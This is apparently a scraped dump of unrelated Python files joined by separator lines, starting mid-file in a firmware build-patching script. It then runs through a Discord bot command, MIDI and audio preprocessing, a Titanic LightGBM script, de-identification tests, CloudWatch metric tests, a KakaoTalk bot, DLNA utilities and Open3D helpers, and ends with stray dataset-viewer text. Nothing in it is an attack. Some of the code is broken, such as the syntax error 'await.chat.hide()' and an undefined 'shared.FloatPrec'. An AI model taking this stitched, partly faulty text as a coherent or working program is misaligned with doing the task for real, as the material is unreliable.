sys.exit(1)
common_patch_command = [os.path.join(config["PYTHON_HOME"], "python"),
os.path.join(config["MIN_PACKAGE_TOOLS"],
"PatchFv", "PatchBinFv.py"),
config["TARGET"],
os.path.join(config["WORKSPACE_SILICON_BIN"],
"PurleySiliconBinPkg"),
os.path.join(config["WORKSPACE"],
"BuildReport.log")]
fvs_to_patch = ["FvTempMemorySilicon",
"FvPreMemorySilicon",
"FvPostMemorySilicon",
"FvLateSilicon"]
for fv in fvs_to_patch:
patch_command = common_patch_command + [fv]
_, _, _, code = execute_script(patch_command, config)
if code != 0:
print(" ".join(patch_command))
print("Patch Error!")
sys.exit(1)
common_rebase_command = [os.path.join(config["PYTHON_HOME"], "python"),
os.path.join(config["MIN_PACKAGE_TOOLS"],
"PatchFv", "RebaseBinFv.py"),
config["TARGET"],
os.path.join(config["WORKSPACE_SILICON_BIN"],
"PurleySiliconBinPkg"),
os.path.join(config["WORKSPACE"],
"BuildReport.log")]
rebase_command = common_rebase_command +\
["FvPreMemorySilicon",
"gMinPlatformPkgTokenSpaceGuid.PcdFlashFvFspMBase"]
_, _, _, code = execute_script(rebase_command, config)
if code != 0:
print(" ".join(rebase_command))
print("Patch Error!")
sys.exit(1)
rebase_command = common_rebase_command +\
["FvPostMemorySilicon",
"gMinPlatformPkgTokenSpaceGuid.PcdFlashFvFspSBase"]
_, _, _, code = execute_script(rebase_command, config)
if code != 0:
print(" ".join(rebase_command))
print("Patch Error!")
sys.exit(1)
return None
def clean_ex(config, functions):
"""Additional clean function
:param config: The environment variables to be used in the build process
:type config: Dictionary
:param functions: A dictionary of function pointers
:type functions: Dictionary
:returns: config dictionary
:rtype: Dictionary
"""
print("clean_ex")
return None
|
import forumsweats.discordbot as discordbot
from ..commandparser import Member
import discord
from forumsweats import db
name = 'duelstreak'
aliases = ('duel-streak', 'duelwinstreak', 'duel-winstreak', 'duelwin-streak', 'duel-win-streak')
args = '[member]'
async def run(message, member: Member = None):
'Tells you your current duel winstreak in #general'
if not member:
member = message.author
winstreak = await db.fetch_duel_winstreak(member.id)
if member.id == message.author.id:
winstreak_message = f'Your duel winstreak is **{winstreak}**'
else:
winstreak_message = f'<@{member.id}> has a duel winstreak of **{winstreak}**'
embed = discord.Embed(
description=winstreak_message
)
await message.channel.send(embed=embed)
|
import multiprocessing
import sys
import mido
import pretty_midi
import numpy as np
import collections
from joblib import Parallel, delayed
from mir_eval.util import hz_to_midi
from tqdm import tqdm
def parse_midi(path):
print("Parsing midi")
"""open midi file and return np.array of (onset, offset, note, velocity) rows"""
midi = mido.MidiFile(path)
print(path)
time = 0
sustain = False
events = []
for message in midi:
time += message.time
if message.type == 'control_change' and message.control == 64 and (message.value >= 64) != sustain:
# sustain pedal state has just changed
sustain = message.value >= 64
event_type = 'sustain_on' if sustain else 'sustain_off'
event = dict(index=len(events), time=time, type=event_type, note=None, velocity=0)
events.append(event)
if 'note' in message.type:
# MIDI offsets can be either 'note_off' events or 'note_on' with zero velocity
velocity = message.velocity if message.type == 'note_on' else 0
event = dict(index=len(events), time=time, type='note', note=message.note, velocity=velocity, sustain=sustain)
events.append(event)
notes = []
for i, onset in enumerate(events):
if onset['velocity'] == 0:
continue
# find the next note_off message
offset = next(n for n in events[i + 1:] if n['note'] == onset['note'] or n is events[-1])
if offset['sustain'] and offset is not events[-1]:
# if the sustain pedal is active at offset, find when the sustain ends
offset = next(n for n in events[offset['index'] + 1:] if n['type'] == 'sustain_off' or n is events[-1])
note = (onset['time'], offset['time'], onset['note'], onset['velocity'])
notes.append(note)
return np.array(notes)
def save_midi(path, pitches, intervals, velocities):
"""
Save extracted notes as a MIDI file
Parameters
----------
path: the path to save the MIDI file
pitches: np.ndarray of bin_indices
intervals: list of (onset_index, offset_index)
velocities: list of velocity values
"""
file = pretty_midi.PrettyMIDI()
piano_program = pretty_midi.instrument_name_to_program('Acoustic Grand Piano')
piano = pretty_midi.Instrument(program=piano_program)
# Remove overlapping intervals (end time should be smaller of equal start time of next note on the same pitch)
intervals_dict = collections.defaultdict(list)
for i in range(len(pitches)):
pitch = int(round(hz_to_midi(pitches[i])))
intervals_dict[pitch].append((intervals[i], i))
for pitch in intervals_dict:
interval_list = intervals_dict[pitch]
interval_list.sort(key=lambda x: x[0][0])
for i in range(len(interval_list) - 1):
# assert interval_list[i][1] <= interval_list[i+1][0], f'End time should be smaller of equal start time of next note on the same pitch. It was {interval_list[i][1]}, {interval_list[i+1][0]} for pitch {key}'
interval_list[i][0][1] = min(interval_list[i][0][1], interval_list[i+1][0][0])
for pitch in intervals_dict:
interval_list = intervals_dict[pitch]
for interval,i in interval_list:
pitch = int(round(hz_to_midi(pitches[i])))
velocity = int(127*min(velocities[i], 1))
note = pretty_midi.Note(velocity=velocity, pitch=pitch, start=interval[0], end=interval[1])
piano.notes.append(note)
file.instruments.append(piano)
file.write(path)
if __name__ == '__main__':
def process(input_file, output_file):
midi_data = parse_midi(input_file)
np.savetxt(output_file, midi_data, '%.6f', '\t', header='onset\toffset\tnote\tvelocity')
def files():
for input_file in tqdm(sys.argv[1:]):
if input_file.endswith('.mid'):
output_file = input_file[:-4] + '.tsv'
elif input_file.endswith('.midi'):
output_file = input_file[:-5] + '.tsv'
else:
print('ignoring non-MIDI file %s' % input_file, file=sys.stderr)
continue
yield (input_file, output_file)
Parallel(n_jobs=multiprocessing.cpu_count())(delayed(process)(in_file, out_file) for in_file, out_file in files())
|
import pandas as pd
import numpy as np
import os
import random
import warnings
warnings.simplefilter('ignore')
from sklearn.preprocessing import LabelEncoder, StandardScaler
from sklearn.model_selection import train_test_split, KFold, StratifiedKFold
import lightgbm as lgb
TARGET = 'Survived'
N_ESTIMATORS = 1000
N_SPLITS = 10
SEED = 2021
EARLY_STOPPING_ROUNDS = 100
VERBOSE = 100
def set_seed(seed=42):
random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
np.random.seed(seed)
set_seed(SEED)
root_path = "./"
train = pd.read_csv(os.path.join(root_path, 'train.csv'))
# y = train['Survived']
# train = train.drop(['Survived'],1)
test = pd.read_csv(os.path.join(root_path, 'test.csv'))
dataset = pd.concat([train, test], axis = 0, ignore_index = True)
# train_len = len(train)
# dataset = dataset.drop(['PassengerId'], 1)
# print('*********Whole Dataset*********\n', dataset.head())
dataset['Age'] = dataset['Age'].fillna(dataset['Age'].mean())
dataset['Cabin'] = dataset['Cabin'].fillna('X').map(lambda x: x[0].strip())
dataset['Ticket'] = dataset['Ticket'].fillna('X').map(lambda x:str(x).split()[0] if len(str(x).split()) > 1 else 'X')
fare_map = dataset[['Fare', 'Pclass']].dropna().groupby('Pclass').median().to_dict()
dataset['Fare'] = dataset['Fare'].fillna(dataset['Pclass'].map(fare_map['Fare']))
dataset['Fare'] = np.log1p(dataset['Fare'])
dataset['Embarked'] = dataset['Embarked'].fillna('X')
dataset['Name'] = dataset['Name'].map(lambda x: x.split(',')[0])
# print('*********Whole Dataset*********\n', dataset.head())
label_cols = ['Name', 'Ticket', 'Sex']
onehot_cols = ['Cabin', 'Embarked']
numerical_cols = ['Pclass', 'Age', 'SibSp', 'Parch', 'Fare']
def label_encoder(c):
le = LabelEncoder()
return le.fit_transform(c)
scaler = StandardScaler()
onehot_encoded_df = pd.get_dummies(dataset[onehot_cols])
label_encoded_df = dataset[label_cols].apply(label_encoder)
numerical_df = pd.DataFrame(scaler.fit_transform(dataset[numerical_cols]), columns=numerical_cols)
target_df = dataset[TARGET]
dataset = pd.concat([numerical_df, label_encoded_df, onehot_encoded_df, target_df], axis=1)
# print('*********Whole Dataset*********\n', dataset.head())
# Light GBM
params = {
'metric': 'binary_logloss',
'n_estimators': N_ESTIMATORS,
'objective': 'binary',
'random_state': SEED,
'learning_rate': 0.01,
'min_child_samples': 150,
'reg_alpha': 3e-5,
'reg_lambda': 9e-2,
'num_leaves': 20,
'max_depth': 16,
'colsample_bytree': 0.8,
'subsample': 0.8,
'subsample_freq': 2,
'max_bin': 240,
}
lgb_oof = np.zeros(train.shape[0])
lgb_preds = np.zeros(test.shape[0])
feature_importances = pd.DataFrame()
skf = StratifiedKFold(n_splits=N_SPLITS, shuffle=True, random_state=SEED)
for fold, (train_idx, valid_idx) in enumerate(skf.split(dataset, dataset[TARGET])):
print(f"===== FOLD {fold} =====")
|
from deidentify.base import Annotation, Document
from deidentify.taggers import CRFTagger
from deidentify.tokenizer import TokenizerFactory
tokenizer = TokenizerFactory().tokenizer(corpus='ons')
tagger = CRFTagger(model='model_crf_ons_tuned-v0.2.0', tokenizer=tokenizer)
def test_annotate():
doc = Document(
name='',
text='Hij werd op 10 oktober door arts Peter de Visser ontslagen van de kliniek.', annotations=[]
)
anns = tagger.annotate([doc])[0].annotations
assert anns == [
Annotation(text='10 oktober', start=12, end=22, tag='Date', doc_id='', ann_id='T0'),
Annotation(text='Peter de Visser', start=33, end=48, tag='Name', doc_id='', ann_id='T1')
]
def test_tags():
expected = [
'SSN',
'Organization_Company',
'Date',
'ID',
'Internal_Location',
'Care_Institute',
'Age',
'Phone_fax',
'Name',
'Profession',
'Hospital',
'Other',
'Initials',
'Address',
'Email',
'URL_IP'
]
assert sorted(tagger.tags) == sorted(expected)
|
# # -*- encoding: utf-8 -*-
import shared as s
import utils as u
def AritMenu():
u.LogoType(s.LogoPath)
print("1 - Adição")
print("2 - Subtração")
print("3 - Multiplicação")
print("4 - Divisão")
print("x - Voltar")
Opt = u.getch()
if Opt == 'x': return 0
u.clear()
print("<'exit' para sair>")
if Opt == '4': print("<Precisão de "+str(shared.FloatPrec)+" decimal(is)")
while 1:
if s.RCount == 0:
Signal = Arit(Opt) # Para capturar retorno da função 'Arit'
if Signal == 'exit':
return 0 # Se valor for 'exit', sair
else:
List = []
for Count in range(s.RCount):
List.insert(Count,Arit(Opt))
print("-- Concluido --")
for i in range(s.RCount):
print(str((i+1))+" - "+List[i])
u.getch()
return 0
def Arit(Opt):
x = u.randint(s.IntMin,s.IntMax)
y = u.randint(s.IntMin,s.IntMax)
if Opt == '1': r = input(str(x)+" + "+str(y)+" = ") ; rs = x+y
elif Opt == '2': r = input(str(x)+" - "+str(y)+" = ") ; rs = x-y
elif Opt == '3': r = input(str(x)+" x "+str(y)+" = ") ; rs = x*y
elif Opt == '4':
try: x/y
except ZeroDivisionError: pass
r = input(str(x)+" / "+str(y)+" = ")
rs = round((x/y),s.FloatPrec)
return u.CheckAnswer(rs,r)
|
import os
import itertools
from concurrent.futures import ProcessPoolExecutor
from functools import partial
from tqdm import trange
import numpy as np
from scipy.misc import imread, imresize
from util import audio
def __load_and_save_images(category, config):
category_input_base_dir = os.path.join(config.base_dir, config.input, 'imgs', str(category))
index = 0
image_limit = config.imgs
for path, _, filenames in os.walk(category_input_base_dir):
for file in filenames:
if image_limit != -1 and index >= image_limit:
break
image_path = os.path.join(category_input_base_dir, file)
raw_image = imread(image_path, mode='RGB')
# Pre-process image
preprocessed_image = imresize(raw_image, (224, 224, 3))
# Write image to disk
preprocessed_image_filename = '{}bird{}.npy'.format(category, index)
np.save(os.path.join(config.base_dir, config.output, preprocessed_image_filename), preprocessed_image,
allow_pickle=False)
index += 1
return index
def __preprocess_audio(category, config):
category_input_base_dir = os.path.join(config.base_dir, config.input, 'wavs', str(category))
out_dir = os.path.join(config.base_dir, config.output)
index = 0
audio_limit = config.wavs
for path, _, filenames in os.walk(category_input_base_dir):
for file in filenames:
if audio_limit != -1 and index >= audio_limit:
break
__generate_spectrograms(os.path.join(category_input_base_dir, file), category, index, out_dir)
index += 1
return index
def __generate_spectrograms(file_path, category, index, out_dir):
wav = audio.load_wav(file_path)
# Compute the linear-scale spectrogram from the wav:
spectrogram = audio.spectrogram(wav).astype(np.float32)
# Compute a mel-scale spectrogram from the wav:
mel_spectrogram = audio.melspectrogram(wav).astype(np.float32)
# Write the spectrograms to disk:
spectrogram_filename = '{}spec{}.npy'.format(category, index)
mel_filename = '{}mel{}.npy'.format(category, index)
np.save(os.path.join(out_dir, spectrogram_filename), spectrogram.T, allow_pickle=False)
np.save(os.path.join(out_dir, mel_filename), mel_spectrogram.T, allow_pickle=False)
def __generate_metadata(category, image_count, audio_count):
meta_data = []
for image_index, audio_index in itertools.product(range(image_count), range(audio_count)):
image_file_name = '{}bird{}.npy'.format(category, image_index)
spec_file_name = '{}spec{}.npy'.format(category, audio_index)
mel_file_name = '{}mel{}.npy'.format(category, audio_index)
meta_data.append('{}|{}|{}\n'.format(spec_file_name, mel_file_name, image_file_name))
return meta_data
def __preprocess_in_parallel(category, config):
image_count = __load_and_save_images(category, config)
audio_count = __preprocess_audio(category, config)
return __generate_metadata(category, image_count, audio_count)
def build(config):
executor = ProcessPoolExecutor(max_workers=config.num_workers)
meta_data = []
for category in trange(config.categories, desc='# Category progress'):
meta_data += executor.submit(partial(__preprocess_in_parallel, category, config)).result()
return meta_data
|
def is_divisible(n):
for divisor in range(2, 21):
if n % divisor != 0:
return False
return True
number = 1
while not is_divisible(number):
number += 1
print(number)
|
# Example 5
def main():
# Create a dictionary with student IDs as the keys
# and student data stored in a list as the values.
students = {
"42-039-4736": ["Clint", "Huish", "hui20001@byui.edu", 16],
"61-315-0160": ["Michelle", "Davis", "dav21012@byui.edu", 3],
"10-450-1203": ["Jorge", "Soares", "soa22005@byui.edu", 15],
"75-421-2310": ["Abdul", "Ali", "ali20003@byui.edu", 5],
"07-103-5621": ["Michelle", "Davis", "dav19008@byui.edu", 0],
"81-298-9238": ["Sama", "Patel", "pat21004@byui.edu", 8]
}
# These are the indexes of the elements in the value lists.
GIVEN_NAME_INDEX = 0
SURNAME_INDEX = 1
EMAIL_INDEX = 2
CREDITS_INDEX = 3
total = 0
# For each item in the list add the number
# of credits that the student has earned.
#this is firts example:
#for item in students.items():
#key = item[0]
#value = item[1]
# Retrieve the number of credits from the value list.
#credits = value[CREDITS_INDEX]
# Add the number of credits to the total.
#total += credits
#print(f"Total credits earned by all students: {total}")
#secund example can simply and we can to do also
for key, value in students.items():
#key = item[0]
#value = item[1]
# Retrieve the number of credits from the value list.
credits = value[CREDITS_INDEX]
# Add the number of credits to the total.
total += credits
print(f"Total credits earned by all students: {total}")
# Call main to start this program.
if __name__ == "__main__":
main()
|
import boto3
import mock
import pytest
import requests
import yaml
from botocore.stub import Stubber
from datetime import datetime
from dateutil.tz import tzutc
from freezegun import freeze_time
from io import StringIO
from app import (
create_hostedgraphite_base_metrics,
format_cloudwatch_metric_datapoint_for_hostedgraphite,
format_config_metric_entry_for_hostedgraphite_base_metric,
get_config,
get_metric_from_cloudwatch,
send_to_hostedgraphite
)
from .fixtures import config
class TestApp:
def setup_method(self):
# Mock out boto3 cloudwatch client
self.client = boto3.client('cloudwatch', region_name="eu-west-1")
self.stubber = Stubber(self.client)
self.stubber.activate()
# Mock out send_to_hostedgraphite method
self.send_to_hostedgraphite_mock = mock.patch('app.send_to_hostedgraphite')
self.send_to_hostedgraphite_mock.start()
def teardown_method(self):
self.send_to_hostedgraphite_mock.stop()
self.stubber.deactivate()
class TestGetConfig(TestApp):
def test_get_config_with_valid_yaml(self):
fake_config = StringIO("""Metrics:
- Namespace: "DM-RequestTimeBuckets"
MetricName: "preview-antivirus-api-request-times-0"
Statistics: "Sum"
Dimensions: {}
Options:
Formatter: 'cloudwatch.request_time_buckets.preview.antivirus-api.request_time_bucket_0.%(statistic)s'
- Namespace: "DM-RequestTimeBuckets"
MetricName: "preview-antivirus-api-request-times-1"
Statistics: "Sum"
Dimensions: {}
Options:
Formatter: 'cloudwatch.request_time_buckets.preview.antivirus-api.request_time_bucket_1.%(statistic)s'
""")
with mock.patch('app.open', return_value=fake_config):
config_dict = get_config()
assert config_dict == {
'Metrics':
[
{
'Namespace': 'DM-RequestTimeBuckets',
'MetricName': 'preview-antivirus-api-request-times-0',
'Statistics': 'Sum',
'Dimensions': {},
'Options': {
'Formatter': 'cloudwatch.request_time_buckets.preview.antivirus-api.'
'request_time_bucket_0.%(statistic)s'
}
},
{
'Namespace': 'DM-RequestTimeBuckets',
'MetricName': 'preview-antivirus-api-request-times-1',
'Statistics': 'Sum',
'Dimensions': {},
'Options': {
'Formatter': 'cloudwatch.request_time_buckets.preview.antivirus-api.'
'request_time_bucket_1.%(statistic)s'
}
}
]
}
def test_get_config_with_invalid_yaml(self):
fake_config = StringIO("""}I am not valid yaml!""")
with mock.patch('app.open', return_value=fake_config), pytest.raises(yaml.YAMLError):
get_config()
class TestSendToHostedGraphite(TestApp):
@mock.patch('app.os.getenv', return_value='our_env_value')
@mock.patch('app.requests.put', return_value=mock.Mock(status_code=200))
def test_send_to_hostedgraphite(self, put, getenv):
send_to_hostedgraphite('Some data')
assert getenv.called_once_with('HOSTED_GRAPHITE_API_KEY')
assert put.called_once_with(
"http://www.hostedgraphite.com/api/v1/sink",
auth=('our_env_value', ''),
data='Some data'
)
@mock.patch('app.logger')
@mock.patch('app.os.getenv')
@mock.patch('app.requests.put', return_value=mock.Mock(status_code=200))
def test_send_to_hostedgraphite_success_logging(self, put, getenv, logger):
send_to_hostedgraphite('Some data')
assert logger.info.called_once_with("Metrics sent to hosted graphite - Status code 200")
@mock.patch('app.logger')
@mock.patch('app.os.getenv')
@mock.patch('app.requests.put', return_value=mock.Mock(spec=requests.Response, status_code=404, reason='Not Found'))
def test_send_to_hostedgraphite_failure_logging(self, put, getenv, logger):
send_to_hostedgraphite('Some data')
assert logger.warning.called_once_with("Error sending metrics to hosted graphite - 404: Not Found")
@mock.patch('app.os.getenv')
@mock.patch('app.requests.put', side_effect=requests.ConnectionError('Timeout'))
def test_send_to_hostedgraphite_failure(self, put, getenv):
with pytest.raises(requests.ConnectionError):
send_to_hostedgraphite('Some data')
class TestFormatCloudwatchMetricDatapointForHostedgraphite(TestApp):
def test_format_cloudwatch_metric_datapoint_for_hostedgraphite(self):
config_entry = {
'Namespace': 'DM-RequestTimeBuckets',
'MetricName': 'preview-antivirus-api-request-times-0',
'Statistics': 'Sum',
'Dimensions': {},
'Options': {
'Formatter': 'cloudwatch.request_time_buckets.preview.antivirus-api.request_time_bucket_0.%(statistic)s'
}
}
metric_datapoint = {'Timestamp': datetime(2018, 9, 20, 14, 18, tzinfo=tzutc()), 'Sum': 1.0, 'Unit': 'None'}
expected_result = (
'cloudwatch.request_time_buckets.preview.antivirus-api.request_time_bucket_0.sum 1.0 1537453080'
)
assert format_cloudwatch_metric_datapoint_for_hostedgraphite(config_entry, metric_datapoint) == expected_result
class TestFormatConfigMetricEntryForHostedgraphiteBaseMetric(TestApp):
def test_format_config_metric_entry_for_hostedgraphite_base_metric(self):
config_entry = {
'Namespace': 'DM-RequestTimeBuckets',
'MetricName': 'preview-antivirus-api-request-times-0',
'Statistics': 'Sum',
'Dimensions': {},
'Options': {
'Formatter': 'cloudwatch.request_time_buckets.preview.antivirus-api.request_time_bucket_0.%(statistic)s'
}
}
timestamp = 1234567890
assert (
format_config_metric_entry_for_hostedgraphite_base_metric(config_entry, timestamp) ==
'cloudwatch.request_time_buckets.preview.antivirus-api.request_time_bucket_0.sum 0.0 1234567890'
)
class TestCreateHostedgraphiteBaseMetric(TestApp):
@freeze_time("2018-09-21 16:00:00")
def test_create_hostedgraphite_base_metrics(self):
base_metrics = create_hostedgraphite_base_metrics(config)
assert base_metrics == [
'cloudwatch.request_time_buckets.preview.antivirus-api.request_time_bucket_0.sum 0.0 1537113600',
'cloudwatch.application_500s.preview.api.500s.sum 0.0 1537113600',
'cloudwatch.incoming_log_events.preview.search-api.nginx_logs.sum 0.0 1537113600'
]
class TestGetMetricFromCloudwatch(TestApp):
@freeze_time("2018-09-21 16:00:00")
def test_get_metric_from_cloudwatch(self):
config_metric_entry = {
'Namespace': 'DM-RequestTimeBuckets',
'MetricName': 'preview-antivirus-api-request-times-0',
'Statistics': 'Sum',
'Dimensions': {},
'Options': {
'Formatter': 'cloudwatch.request_time_buckets.preview.antivirus-api.request_time_bucket_0.%(statistic)s'
}
}
self.client.get_metric_statistics = mock.Mock()
get_metric_from_cloudwatch(self.client, config_metric_entry)
self.client.get_metric_statistics.assert_called_once_with(
Period=60,
StartTime=datetime(2018, 9, 21, 15, 50),
EndTime=datetime(2018, 9, 21, 16, 0),
MetricName='preview-antivirus-api-request-times-0',
Namespace='DM-RequestTimeBuckets',
Statistics=['Sum'],
Dimensions=[],
Unit='None',
)
|
from kakaopy.client import Client
import json
class main(Client):
async def onMessage(self, chat):
print(chat.message)
if chat.message == "power":
await chat.reply("kakaopy is runnnnnnnnning~")
if chat.message == "Hello":
attachment = {'mentions': [{'user_id': chat.authorId, 'at': [1], 'len': 2}]}
await chat.channel.sendChat("Hello~ " + "@태그",json.dumps(attachment),1)
#If you have open chat permission
if chat.message == ".hide":
await.chat.hide()
|
import random
import subprocess
from pathlib import Path
from xml.dom.minidom import Childless
import time
import os
import appdirs
import socket
BASE_RAND_STR = 'ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz0123456789'
BASE_RAND_STR_LEN = len(BASE_RAND_STR)
def random_str(str_len=16)->str:
result_str = ''
length = BASE_RAND_STR_LEN - 1
for i in range(str_len):
result_str += BASE_RAND_STR[random.randint(0, length)]
return result_str
def is_in_nuitka() -> bool:
t = os.environ.get("nuitka", None)
return t is not None
def get_abs_path(rel_path=None) -> Path:
if is_in_nuitka():
if rel_path is not None:
return (Path(os.environ.get('nuitka_exe_dir')) / Path(rel_path)).absolute()
else:
return Path(os.environ.get('nuitka_exe_dir')).absolute()
elif rel_path is not None:
return Path(rel_path).absolute()
else:
return Path('.').absolute()
def get_element_data_by_tag_name(doc, tag_name, index=0, default=None) -> str:
element = get_element_by_tag_name(doc, tag_name, index)
child = element.firstChild
if child is None:
return default
if not hasattr(child, 'data'):
return default
return child.data
def get_element_by_tag_name(doc, tag_name, index=0, default=Childless()):
elements = doc.getElementsByTagName(tag_name)
if len(elements) == 0:
return default
return elements[index]
def wait_interval(interval, start, end):
dur = end - start
rest = interval - dur
if rest >= 0:
time.sleep(rest)
return rest
def to_seconds(t: str) -> int:
s = 0
a = t.split(':')
try:
s = int(a[0]) * 60 * 60 + int(a[1]) * 60 + int(a[2])
except:
return 0
return s
def format_time(seconds) -> str:
m, s = divmod(seconds, 60)
h, m = divmod(m, 60)
return "%02d:%02d:%02d" % (h, m, s)
def get_user_data_dir():
user_dir = appdirs.user_data_dir('pysimpledlna', 'wx_c')
if not os.path.exists(user_dir):
os.makedirs(user_dir)
return os.path.abspath(user_dir)
def get_playlist_dir(base, playlist):
full_path = os.path.join(base, playlist)
if not os.path.exists(full_path):
os.makedirs(full_path)
return os.path.abspath(full_path)
def get_log_file_path():
return str((Path(get_user_data_dir()) / Path('./logs/log.txt')).absolute())
def get_log_file_dir():
return os.path.join(get_user_data_dir(), 'logs')
def get_desktop_dir():
import winreg
key = winreg.OpenKey(
winreg.HKEY_CURRENT_USER,
r"Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
)
desktop, _ = winreg.QueryValueEx(key, 'Desktop')
return desktop
def get_setting_file_path():
user_dir = get_user_data_dir()
return os.path.join(user_dir, 'settings.json')
def get_history_file_path():
user_dir = get_user_data_dir()
return os.path.join(user_dir, 'history.txt')
def get_free_tcp_port():
tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp.bind(('', 0))
addr, port = tcp.getsockname()
tcp.close()
return port
def is_tcp_port_occupied(ip_address: str, port: int):
tcp = None
try:
tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp.bind((ip_address, port))
tcp.close()
return False
except:
return True
finally:
try:
if tcp is not None:
tcp.close()
except:
pass
def start_subprocess(command, cwd='.'):
return subprocess.Popen(command, cwd=cwd, shell=True, creationflags=subprocess.DETACHED_PROCESS)
def is_in_prompt_mode(args):
return hasattr(args, 'prompt_mode')
|
#!/usr/bin/env python
import os
import numpy as np
import open3d as o3
import transforms3d as t3
import pyquaternion as pq
def invert_ht(ht):
ht = np.tile(ht, [1, 1, 1])
iht = np.tile(np.identity(4), [ht.shape[0], 1, 1])
iht[..., :3, :3] = ht[..., :3, :3].transpose(0, 2, 1)
iht[..., :3, [3]] = -np.matmul(iht[..., :3, :3], ht[..., :3, [3]])
return iht.squeeze()
def create_wire_box(edgelengths, color=[0.0, 0.0, 0.0]):
lineset = o3.LineSet()
x, y, z = edgelengths
lineset.points = o3.Vector3dVector([[0, 0, 0], [x, 0, 0], [0, y, 0],
[x, y, 0], [0, 0, z], [x, 0, z], [0, y, z], [x, y, z]])
lineset.lines = o3.Vector2iVector([[0, 1], [1, 3], [3, 2], [2, 0],
[0, 4], [1, 5], [3, 7], [2, 6],
[4, 5], [5, 7], [7, 6], [6, 4]])
lineset.colors = o3.Vector3dVector(np.tile(color, [len(lineset.lines), 1]))
return lineset
def intensity2color(intensity):
return np.tile(np.reshape(intensity * 0.8, [-1, 1]), [1, 3])
def xyp2ht(xyp):
ht = np.tile(np.identity(4), [xyp.size / 3, 1, 1])
cp = np.cos(xyp[..., 2])
sp = np.sin(xyp[..., 2])
ht[..., :2, 3] = xyp[..., :2]
ht[..., 0, 0] = cp
ht[..., 0, 1] = -sp
ht[..., 1, 0] = sp
ht[..., 1, 1] = cp
return ht.squeeze()
def ht2xyp(ht):
ht = np.tile(ht, [1, 1, 1])
p = np.arctan2(ht[..., 1, 0], ht[..., 0, 0])
return np.hstack([ht[..., :2, 3], np.reshape(p, [-1, 1])]).squeeze()
def interpolate_ht(ht, t, tq):
amount = np.clip((tq - t[0]) / np.diff(t), 0.0, 1.0)
pos = ht[0, :3, 3] + amount * np.diff(ht[:, :3, 3], axis=0).squeeze()
q = [pq.Quaternion(matrix=m) for m in ht]
qq = pq.Quaternion.slerp(q[0], q[1], amount=amount)
return t3.affines.compose(pos, qq.rotation_matrix, np.ones(3))
def project_xy(ht):
htp = np.identity(4)
htp[:2, 0] = ht[:2, 0] / np.linalg.norm(ht[:2, 0])
htp[:2, 1] = [-htp[1, 0], htp[0, 0]]
htp[:2, 3] = ht[:2, 3]
return htp
def xyzi2pc(xyz, intensities=None):
pc = o3.PointCloud()
pc.points = o3.Vector3dVector(xyz)
if intensities is not None:
pc.colors = o3.Vector3dVector(intensity2color(intensities / 255.0))
return pc
def average_angles(angles, weights=None):
if weights is None:
weights = np.ones(angles.shape[0])
x = np.cos(angles) * weights
y = np.sin(angles) * weights
return np.arctan2(np.sum(y), np.sum(x))
def makedirs(dir):
try:
os.makedirs(dir)
except:
pass
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.